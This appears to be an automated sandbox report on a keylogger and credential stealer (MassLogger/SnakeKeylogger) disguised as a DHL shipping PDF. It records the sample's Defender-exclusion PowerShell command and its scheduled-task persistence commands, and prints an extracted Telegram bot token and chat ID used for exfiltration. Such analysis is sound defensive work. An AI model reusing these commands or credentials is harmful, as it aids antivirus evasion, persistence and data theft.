Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe, ParentImage: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe, ParentProcessId: 6160, ParentProcessName: PZgkJsntUXo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp", ProcessId: 2352, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ParentImage: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ParentProcessId: 6808, ParentProcessName: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", ProcessId: 6300, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ParentImage: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ParentProcessId: 6808, ParentProcessName: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ProcessId: 6020, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6900, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ParentImage: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ParentProcessId: 6808, ParentProcessName: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp", ProcessId: 6300, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T19:08:14.337531+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49684	132.226.247.73	80	TCP
2025-03-12T19:08:17.931322+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49686	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7208417702:AAEVwXEzB7QSAuFkwz3SdCf4I3txnqmflEw", "Telegram Chatid": "7731003424"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Virustotal: Detection: 50%			Perma Link

Multi AV Scanner detection for submitted file

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Virustotal: Detection: 50%			Perma Link
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	ReversingLabs: Detection: 34%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.0

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 072BA9ACh	0_2_072BAA62
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 00D65782h	8_2_00D65358
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 00D651B9h	8_2_00D64F08
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 00D65782h	8_2_00D656AF
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F81935h	8_2_04F815F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8E778h	8_2_04F8E4D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F80741h	8_2_04F80498
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8BF28h	8_2_04F8BC80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F83EF8h	8_2_04F83C50
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8DEC8h	8_2_04F8DC20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8D088h	8_2_04F8CDE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8F028h	8_2_04F8ED80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F80FF1h	8_2_04F80D48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8C7D8h	8_2_04F8C530
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8A970h	8_2_04F8A6C8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8D93Ah	8_2_04F8D690
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8F8D8h	8_2_04F8F630
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8A0C0h	8_2_04F89E18
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F83AA0h	8_2_04F837F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8B220h	8_2_04F8AF78
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F831F0h	8_2_04F82F48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F80B99h	8_2_04F808F0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8C380h	8_2_04F8C0D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F84350h	8_2_04F840A8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8E320h	8_2_04F8E078
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F802E9h	8_2_04F80040
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8BAD0h	8_2_04F8B828
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8F480h	8_2_04F8F1D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F81449h	8_2_04F811A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8CC30h	8_2_04F8C988
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8EBD0h	8_2_04F8E928
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F82D98h	8_2_04F82AF0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8FD30h	8_2_04F8FA88
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8A518h	8_2_04F8A270
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8D4E0h	8_2_04F8D238
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8B678h	8_2_04F8B3D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F83648h	8_2_04F833A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Code function: 4x nop then jmp 04F8ADC8h	8_2_04F8AB20
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 07A39C3Ch	9_2_07A39CF2
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 01645782h	13_2_01645367
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 016451B9h	13_2_01644F08
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 01645782h	13_2_016456AF
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 05C40740h	13_2_05C40498
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 05C402E8h	13_2_05C40040
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then mov esp, ebp	13_2_05C44DD3
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_05C40B20
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 05C417FDh	13_2_05C41620
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 4x nop then jmp 05C42187h	13_2_05C41620

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49686 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49684 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000294C000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: svchost.exe, 0000000F.00000002.2179521971.000001799D000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.15.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000297B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000311B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000297B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000311B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.969436343.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1003616950.000000000324B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: edb.log.15.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000F.00000003.1203412931.000001799CF00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: qmgr.db.15.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PZgkJsntUXo.exe, 0000000D.00000002.2176124886.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	String found in binary or memory: https://www.google.com/?Please

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
